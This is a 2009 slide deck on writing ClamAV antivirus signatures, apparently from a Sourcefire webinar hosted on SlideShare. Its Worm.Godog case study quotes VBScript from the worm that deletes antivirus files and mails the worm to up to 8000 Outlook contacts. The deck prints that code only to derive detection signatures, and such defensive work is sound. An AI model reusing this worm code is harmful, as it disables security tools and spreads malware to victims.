Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Rahul Sasi
 
Andsec Reversing on Mach-o File
Andsec Reversing on Mach-o FileAndsec Reversing on Mach-o File
Andsec Reversing on Mach-o File
Ricardo L0gan
 
H2HC - R3MF
H2HC - R3MFH2HC - R3MF
H2HC - R3MF
Ricardo L0gan
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
IOSR Journals
 
Cppcheck and PVS-Studio compared
Cppcheck and PVS-Studio comparedCppcheck and PVS-Studio compared
Cppcheck and PVS-Studio compared
PVS-Studio
 
Techniques of attacking ICS systems
Techniques of attacking ICS systems Techniques of attacking ICS systems
Techniques of attacking ICS systems
qqlan
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
CODE BLUE
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
Andrey Karpov
 
An Experiment with Checking the glibc Library
An Experiment with Checking the glibc LibraryAn Experiment with Checking the glibc Library
An Experiment with Checking the glibc Library
Andrey Karpov
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
technology_flow
 

Similar to Webinar alain-2009-03-04-clamav (20)

Advanced System Security and Digital Forensics
Advanced System Security and Digital ForensicsAdvanced System Security and Digital Forensics
Advanced System Security and Digital Forensics
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)Formbook - In-depth malware analysis (Botconf 2018)
Formbook - In-depth malware analysis (Botconf 2018)
 
BSides IR in Heterogeneous Environment
BSides IR in Heterogeneous EnvironmentBSides IR in Heterogeneous Environment
BSides IR in Heterogeneous Environment
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
Automatic tool for static analysis
Automatic tool for static analysisAutomatic tool for static analysis
Automatic tool for static analysis
 
Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...Chasing the Adder. A tale from the APT world...
Chasing the Adder. A tale from the APT world...
 
cinema_time_new.pdf
cinema_time_new.pdfcinema_time_new.pdf
cinema_time_new.pdf
 
Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017 Forensics perspective ERFA-møde marts 2017
Forensics perspective ERFA-møde marts 2017
 
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.
 
Andsec Reversing on Mach-o File
Andsec Reversing on Mach-o FileAndsec Reversing on Mach-o File
Andsec Reversing on Mach-o File
 
H2HC - R3MF
H2HC - R3MFH2HC - R3MF
H2HC - R3MF
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Cppcheck and PVS-Studio compared
Cppcheck and PVS-Studio comparedCppcheck and PVS-Studio compared
Cppcheck and PVS-Studio compared
 
Techniques of attacking ICS systems
Techniques of attacking ICS systems Techniques of attacking ICS systems
Techniques of attacking ICS systems
 
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
An Experiment with Checking the glibc Library
An Experiment with Checking the glibc LibraryAn Experiment with Checking the glibc Library
An Experiment with Checking the glibc Library
 
Metasploit Framework Executable Encoding
Metasploit Framework Executable EncodingMetasploit Framework Executable Encoding
Metasploit Framework Executable Encoding
 

Webinar alain-2009-03-04-clamav

  • 1. Writing ClamAV Signatures Alain Zidouemba March 4, 2009
  • 2. About the presenter Alain Zidouemba • VRT Research Engineer for over a year • Primary responsibilities: • Malware research & signatures generation – ClamAV • Vulnerability research & rules generation – Snort • Before Sourcefire: Anti-Malware Research Engineer 2
  • 3. Outline What is ClamAV Where to get ClamAV Different ClamAV signature formats: • .hdb • .mdb • .ndb • .ldb Whitelisting Q&A 3
  • 5. What is ClamAV? Clam AntiVirus (ClamAV) is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways Provides a number of utilities including: • A flexible and scalable multi-threaded daemon (clamd) • A command line scanner (clamscan)‫‏‬ • An advanced tool for automatic database updates (freshclam)‫‏‬ • Sigtool – more later 5
  • 6. Where can I get ClamAV from? Latest stable release: ClamAV 0.94.2 • http://www.clamav.net/download/sources Most popular UNIX operating systems are supported: • GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X Up-to-date list of binary packages is available at our website: • http://clamav.net/download/packages 6
  • 7. Why learn how to write sigs? I thought Sourcefire released signatures updates several times a day! 7
  • 8. ClamAV malware detection Goal: recognize and block malware Detection is: • File-centric • Focus on recognizing malicious code in file Not intended to replace desktop AV First line of defense 8
  • 9. ClamAV Virus Database (CVD) The ClamAV project distributes two CVD files • main.cvd • daily.cvd Sigtool (ships with ClamAV) can display detailed information on CVD files: 9
  • 10. Various signature files in .cvd archive 10
  • 12. Hash database: *.hdb The format for .hdb files is as follows: • MD5:Size:MalwareName To create a signature for test.exe use the --md5 option of sigtool: 12
  • 13. Hash database: *.hdb (cont’d) That’s it! The signature is ready to be used: • The name for the detection can be changed: 13
  • 14. MD5, PE-section based: *.mdb The format for .mdb files is as follows: • PESectionSize:MD5:MalwareName The easiest way to generate MD5 based section signatures is to extract target PE sections into separate files and then run sigtool with the option -- mdb: 14
  • 15. Case study: Trojan.Bagle-328 IDA Pro indicates that the sample is “packed” Packed with Themida (as per PEiD)‫‏‬ 15
  • 16. Case study: Trojan.Bagle-328 (cont'd) Themida is used by malware writers...but also by legitimate products – false positive likely We can use pe-sig, a Ruby script that will create sigs for each section of a PE file: Finally, the signature is: • 237568:ce914ca1bbea795a7021854431663623:Trojan.Bagle-328 16
  • 17. Extended sig. format: *.ndb The format for .ndb files is as follows: • MalwareName:TargetType:Offset:HexSignature • TargetType is one of the following numbers specifying the type of the target file: 0: Any file 4: Mail File 1: Portable Executable 5: Graphics 2: OLE2 component (eg: VBA script) 6: ELF 3: HTML (normalized) 7: ASCII text file (normalized) 17
  • 18. Case study: Trojan.Exchanger Many files that are very similar yet different 18
  • 19. Case study: Trojan.Exchanger (cont’d) 5.exe: Opcode: • e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 Signature: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 19
  • 20. Case study: Trojan.Exchanger (cont’d) 7.exe: Opcode: • e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 Signature: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 20
  • 21. Case study: Trojan.Exchanger (cont’d) Signature for 5.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3c4766402e8dbffffffe846ffffffe2e4 Signature for 7.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c383315a00e8dbffffffe846ffffffe2e4 Signature to detect both 5.exe and 7.exe: • Trojan.Exchanger:1:*:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4 21
  • 22. Case study: Trojan.Exchanger (cont’d) Moreover, for 5.exe: • EP: 0x4094E0 • Binary string: 0x4095C5 For 7.exe: • EP: 0x406D87 • Binary string: 0x406E6C In both cases the distance between EP and our binary string is the same: 0xE5 = 229 (decimal) 22
  • 23. Case study: Trojan.Exchanger (cont’d) Finally we can rewrite the signature to be: • Trojan.Exchanger:1:EP+229:e81c000000e8e6ffffff81c3{4}e8dbffffffe846ffffffe2e4 This signature is more precise and even matches other samples: 23
  • 24. Logical signatures: *.ldb‫‏‬ Logical signatures introduced in ClamAV 0.94 The format for .ldb files is as follows: • SignatureName;TargetDescriptionBlock;LogicalExpr ession;Subsig0;Subsig1;Subsig2;... 24
  • 25. Case study: Worm.Godog A mass-mailer worm, code is in VBS Registro = legion.regread("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionProgramFilesDir")‫‏‬ If FileExists (Registro & "Kaspersky LabKaspersky Antivirus Personal ProAvp32.exe") then path = Registro & "Kaspersky LabKaspersky Antivirus Personal Pro" legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal Pro*.*")‫‏‬ If fileexists (Registro & "Kaspersky LabKaspersky Antivirus PersonalAvp32.exe") then path = Registro & "Kaspersky LabKaspersky Antivirus Personal" legions.DeleteFile (Registro & "Kaspersky LabKaspersky Antivirus Personal*.*")‫‏‬ if FileExists(Registro & "Antiviral Toolkit Proavp32.exe") then path = Registros & "Antiviral Toolkit Pro" legions.DeleteFile (Registro & "Antiviral Toolkit Pro*.*")‫‏‬ if fileexists (Registro & "AVPersonalAvguard.exe") then path = Registro & "AVPersonal" legions.DeleteFile (Registro & "AVPersonal*.*")‫‏‬ if fileexists (Registro & "Trend PC-cillin 98IOMON98.EXE") then path = Registro & "Trend PC-cillin 98" legions.DeleteFile (Registro & "Trend PC-cillin 98*.*")‫‏‬ legions.DeleteFile (Registro & "Trend PC-cillin 98*.EXE")‫‏‬ legions.DeleteFile (Registro & "Trend PC-cillin 98*.dll") 25
  • 26. Case study: Worm.Godog (cont’d) After normalization, we can create 4 signatures to detect each attempt to disable AV tools as follows: (0) Kaspersky Antivirus Personal/Kaspersky Antivirus Personal Pro: 66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c {-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c (1) Antiviral Toolkit Pro: 66696c6565786973747328{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f {-100}2e64656c65746566696c652028{-25}202620225c616e7469766972616c20746f6f6c6b69742070726f (2) AVPersonal: 66696c656578697374732028{-25}202620225c6176706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6176706572736f6e616c (3) Trend PC-cillin 98: 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e {-100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e 26
  • 27. Case study: Worm.Godog (cont’d) Worm also send itself to the first 8000 contacts found in the address book: Set Create = CreateObject ("Scripting.FileSystemObject")‫‏‬ Set mail = Create.CreateTextFile("C:mail.vbs")‫‏‬ mail.writeline "On Error Resume Next" mail.writeline "Dim leg, Mail, Counter, A, B, C, D, E" mail.writeline "Set leg = CreateObject" & Chr(32)& "(" & chr(34) & "Outlook.Application" & Chr(34) &")" mail.writeline "Set C = CreateObject "& Chr(32) & "(" & chr(34) & "Scripting.FileSystemObject" & Chr(34)& ")" mail.writeline "Set Mail = leg.GetNameSpace" & Chr(32) & "(" & chr(34)& "MAPI" & Chr(34)&")" mail.writeline "For A = 1 To Mail.AddressLists.Count" mail.writeline "Set B = Mail.AddressLists (A)" mail.writeline "Counter = 1" mail.writeline "Set C = leg.CreateItem (0)" mail.writeline "For D = 1 To B.AddressEntries.Count" mail.writeline "E = B.AddressEntries (Counter)" mail.writeline "C.Recipients.Add E" mail.writeline "Counter = Counter + 1" mail.writeline "If Counter > 8000 Then Exit For" mail.writeline "Next" mail.writeline "C.Subject =" & Chr(32) & Chr(34) &"Legion Game" & Chr(34)‫‏‬ mail.writeline "C.Body = "& Chr(32) & Chr(34) & "YA jugaste el juego Legion? si no aqui te lo doy checalo y hay me dices que tal..." & Chr(34) ‫‏‬ mail.writeline "C.Attachments.Add"& Chr(32) & Chr(34) & "C:Legion.vbs" & Chr(34)‫‏‬ mail.writeline "C.DeleteAfterSubmit = True" mail.writeline "C.Send" mail.writeline "Next" mail.Close legion.Run ("C:mail.vbs") 27
  • 28. Case study: Worm.Godog (cont’d) A signature to detect this worm portion of the file could be: (4) 666f7220{-10}203d203120746f20{-10}2e61646472657373656e74726965732e636f756e74 {-100}726563697069656e74732e616464{-100}696620{-10}203e20 {-5}207468656e206578697420666f72{-300}2e6174746163686d656e74732e616464 {-150}2e73656e64 Finally, we can write this highly flexible signature: • Worm.Godog;Target:0;((0|1|2|3)& (4));(0);(1);(2);(3);(4) in a .ldb file: Worm.Godog;Target:0;((0|1|2|3)& (4));66696c656578697374732028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c{-100}2e64656c65746566696c652028 {-25}202620225c6b6173706572736b79206c61625c6b6173706572736b7920616e7469766972757320706572736f6e616c ;66696c6565786973747328{- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f{-100}2e64656c65746566696c652028{- 25}202620225c616e7469766972616c20746f6f6c6b69742070726f; 66696c656578697374732028{-25}202620225c6176706572736f6e616c{- 100}2e64656c65746566696c652028{-25}202620225c6176706572736f6e616c; 66696c656578697374732028{-25}202620225c7472656e642070632d63696c6c696e{- 100}2e64656c65746566696c652028{-25}202620225c7472656e642070632d63696c6c696e ;666f7220{-10}203d203120746f20{- 10}2e61646472657373656e74726965732e636f756e74{-100}726563697069656e74732e616464{-100}696620{-10}203e20{-5}207468656e206578697420666f72{- 300}2e6174746163686d656e74732e616464{-150}2e73656e64 28
  • 29. Whitelisting To whitelist a specific file create an entry in a database file with the extension of .fp following the MD5 signature format: • MD5:FileSize:Comment 29
  • 30. Whitelisting (cont’d) To whitelist a specific signature inside main.cvd add the following entry into a local file local.ign: • db_name:line_number:signature_name To ignore the “myTestSignature” at line 23 in test.ndb: • test.ndb:23:myTestSignature Daily.ign: 30
  • 31. More questions? clamav-users@lists.clamav.net - user questions clamav-devel@lists.clamav.net - technical discussions Alternatively you can try asking on the #clamav IRC channel on irc.freenode.net If you have questions or comments on this presentation: azidouemba@sourcefire.com 31
  • 32. ClamAV/VRT/Sourcefire Websites • http://www.clamav.net • http://www.snort.org • htttp://www.sourcefire.com Blogs • http://clam-av.blogspot.com • http://vrt-sourcefire.blogspot.com 32
  • 33. Contribute Sample submission • http://www.clamav.net/sendvirus/ Upload statistics: • freshclam --submit-stats Bug submission • http://bugs.clamav.net 33
  • 34. Q&A
  • 35. NOW GO AND WRITE SIGNATURES! 35 Source: http://www.topnews.in/wireless-worms-may-spread-same-manner-flu-222714